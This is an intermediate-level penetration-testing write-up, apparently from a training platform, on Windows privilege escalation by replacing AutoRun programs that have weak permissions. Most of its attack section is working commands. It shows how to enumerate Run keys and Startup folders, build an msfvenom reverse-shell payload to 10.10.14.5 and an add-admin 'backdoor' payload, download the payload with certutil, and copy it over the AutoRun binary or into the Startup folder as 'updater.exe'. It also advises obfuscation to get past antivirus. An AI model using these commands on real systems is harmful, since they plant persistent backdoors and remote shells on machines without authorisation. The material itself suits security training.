AutoRun Exploitation

intermediate25 minWriteup

Exploiting weak permissions on AutoRun programs

Learning Objectives

  • Find AutoRun programs
  • Check file permissions
  • Replace AutoRun programs
  • Wait for privilege escalation

AutoRun entries tell Windows to execute programs automatically at startup or login. If an AutoRun program has weak permissions - meaning we can replace it - we can hijack the execution.

Patience Required

AutoRun exploitation requires waiting for the target user to log in or the system to reboot. This is a plant and wait attack.

AutoRun Locations

1AutoRun Registry Locations:
2 
3System-wide (all users):
4- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
5- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
6- HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
7 
8Per-user:
9- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
10- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
11 
12Startup Folders:
13- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
14- C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Enumerating AutoRun Entries

batch
1REM Query AutoRun registry keys
2 
3REM System-wide AutoRun (HKLM)
4reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
5reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
6 
7REM Current user AutoRun (HKCU)
8reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
9reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
10 
11REM Check Startup folders
12dir 606070;">#a5d6ff;">"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
13dir 606070;">#a5d6ff;">"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"

Using PowerUp

powershell
1606070;"># PowerUp automates finding vulnerable AutoRun entries
2Import-Module PowerUp.ps1
3 
4606070;"># Find modifiable AutoRun entries
5Get-ModifiableRegistryAutoRun

Checking File Permissions

batch
1REM For each AutoRun entry, check if we can modify the file
2 
3REM Check file permissions
4icacls 606070;">#a5d6ff;">"C:\VulnApp\startup.exe"
5REM Look for: BUILTIN\Users:(M) or (F)
6 
7REM Also check the directory
8icacls 606070;">#a5d6ff;">"C:\VulnApp"
9REM If directory is writable, we can replace/rename the file
10 
11REM Using accesschk (Sysinternals)
12accesschk.exe /accepteula -wvu 606070;">#a5d6ff;">"C:\VulnApp\startup.exe"
13accesschk.exe /accepteula -wvud 606070;">#a5d6ff;">"C:\VulnApp"
14 
15REM WinPEAS checks this automatically
16.\winpeas.exe applicationsinfo

Check Directory Too

Even if the file isn't directly writable, if the DIRECTORY is writable, you can rename the original and place your malicious file.

Exploitation

batch
1REM Exploiting Writable AutoRun Binary
2 
3REM 1. Verify we can write to it
4icacls 606070;">#a5d6ff;">"C:\VulnApp\startup.exe"
5 
6REM 2. Backup original (optional)
7copy 606070;">#a5d6ff;">"C:\VulnApp\startup.exe" "C:\VulnApp\startup.exe.bak"
8 
9REM 3. Generate payload (on attacker machine):
10REM msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o startup.exe
11 
12REM 4. Transfer payload
13certutil -urlcache -f http:606070;">//10.10.14.5/startup.exe C:\temp\startup.exe
14 
15REM 5. Replace the AutoRun binary
16copy /Y C:\temp\startup.exe 606070;">#a5d6ff;">"C:\VulnApp\startup.exe"
17 
18REM 6. Set up listener and wait for login/reboot

Alternative: Directory Writable

batch
1REM If directory is writable but file is not:
2 
3REM 1. Rename original
4move 606070;">#a5d6ff;">"C:\VulnApp\startup.exe" "C:\VulnApp\startup_orig.exe"
5 
6REM 2. Place our malicious file
7copy C:\temp\malicious.exe 606070;">#a5d6ff;">"C:\VulnApp\startup.exe"

Startup Folder Exploitation

batch
1REM Startup folders are another AutoRun mechanism
2 
3REM Check All Users Startup folder permissions
4icacls 606070;">#a5d6ff;">"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
5 
6REM If writable:
7copy C:\temp\shell.exe 606070;">#a5d6ff;">"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\updater.exe"
8 
9REM Current User Startup (always writable for current user)
10copy C:\temp\shell.exe 606070;">#a5d6ff;">"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\updater.exe"

Payload Considerations

bash
1606070;"># Payload options for AutoRun exploitation
2 
3606070;"># 1. Reverse shell (requires listener)
4msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe
5 
6606070;"># 2. Add admin user (no listener needed)
7msfvenom -p windows/adduser USER=backdoor PASS=Password123! -f exe -o adduser.exe

AV Detection

AutoRun exploitation often fails due to antivirus. The malicious executable may be scanned and blocked. Consider obfuscation.

AutoRun Exploitation Methodology

AutoRun Hijacking Flow

1
EnumerateQuery registry Run keys and Startup folders
2
IdentifyFind entries pointing to modifiable files
3
VerifyCheck permissions with icacls/accesschk
4
BackupSave original binary if needed
5
ReplaceOverwrite with malicious executable
6
WaitWait for login/reboot to trigger
7
AccessUse new credentials or catch shell

Knowledge Check

Quick Quiz
Question 1 of 2

When do HKLM Run entries execute?

Key Takeaways

  • AutoRun entries in HKLM Run execute for all users at login
  • Check file AND directory permissions with icacls
  • Hijack by replacing the binary the AutoRun points to
  • Startup folders are another AutoRun mechanism
  • Must wait for login/reboot to trigger exploitation